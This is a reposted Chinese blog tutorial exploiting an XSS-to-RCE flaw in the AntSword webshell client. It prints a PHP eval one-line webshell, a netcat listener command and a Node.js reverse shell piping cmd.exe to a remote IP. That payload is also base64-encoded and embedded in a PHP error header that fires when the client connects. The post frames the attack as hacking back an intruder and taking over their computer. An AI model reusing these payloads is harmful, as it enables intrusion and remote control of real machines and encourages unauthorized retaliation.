中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
WebShell
WebShell可以理解为网页中的木马程序,通过植入到你的web站点,在web页面上的操作,控制你的计算机操作系统,文件,权限,任意命令执行。
常见的WebShell分为大马、小马、一句话木马、内存马等。
# 一句话木马
<?php @eval($_POST['pass']); ?>
中国蚁剑(AntSword)
当你的计算机被植入了一句话木马后,需要通过工具进行连接,才可以方便管理,而AntSword就是连接一句话木马工具中的其中之一,类似的工具还有:中国菜刀、哥斯拉、冰蝎等。
中国蚁剑(AntSword) RCE漏洞
此漏洞为AntSword连接WebShell失败时对html代码的解析,导致xss漏洞,而使html代码不在浏览器解析而是在服务器上解析的话需要用到nodejs,所以AntSword使用了nodejs,本文章就讲解利用xss漏洞执行并调用nodejs的库反弹shell拿到权限。
吊打黑客的场景
黑客在你的web服务上植入了WebShell,利用蚁剑去连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来以前读到过的我这篇文章,你抱着试试看的态度去尝试了一下,发现成功反向黑掉了那个黑客的电脑,于是你对这个黑客一系列的还击计划开始在脑海里活蹦乱跳…
模拟环境准备:
黑客电脑软件:
被攻击电脑软件
瑞士军刀Netcat
被攻击电脑web部署
黑客电脑连接WebShell
此时我们作为被攻击的电脑,可以尝试修改WebShell的代码
<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?>
发现执行了我们修改的代码中的alert(1) 弹出了提示框,证明是存在xss漏洞的
利用nodejs库编写payload,反弹黑客电脑的shell
nc -Lp 1971
var net = require("net");
var cmd = require("child_process").exec("cmd.exe");
var socket = new net.Socket();
socket.connect(1971, "192.168.31.222", function(){
socket.pipe(cmd.stdin);
cmd.stdout.pipe(socket);
cmd.stderr.pipe(socket);
});
以上代码通过创建Socket来连接192.168.31.222(被攻击的电脑ip) 的1971端口(Netcat监听的端口)
dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7
通过javascript的eval函数来调用:
eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())
并替换掉我们前边写的alert(1)代码,最终写到shell.php中的代码如下:
<?php header("HTTP/1.1 500 <img src=1 onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())' />") ?>
黑客使用蚁剑重连,在报错的同时,反弹给了我们一个shell到Netcat监听的1971端口上
利用shell执行命令,查看信息,成功拿下黑客电脑的管理员账号,ip也对应黑客电脑的192.168.31.124
至此,你终于可以对黑客发起反击,进行后渗透…
原文地址:https://blog.csdn.net/qq_42560204/article/details/129596101
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_24332.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!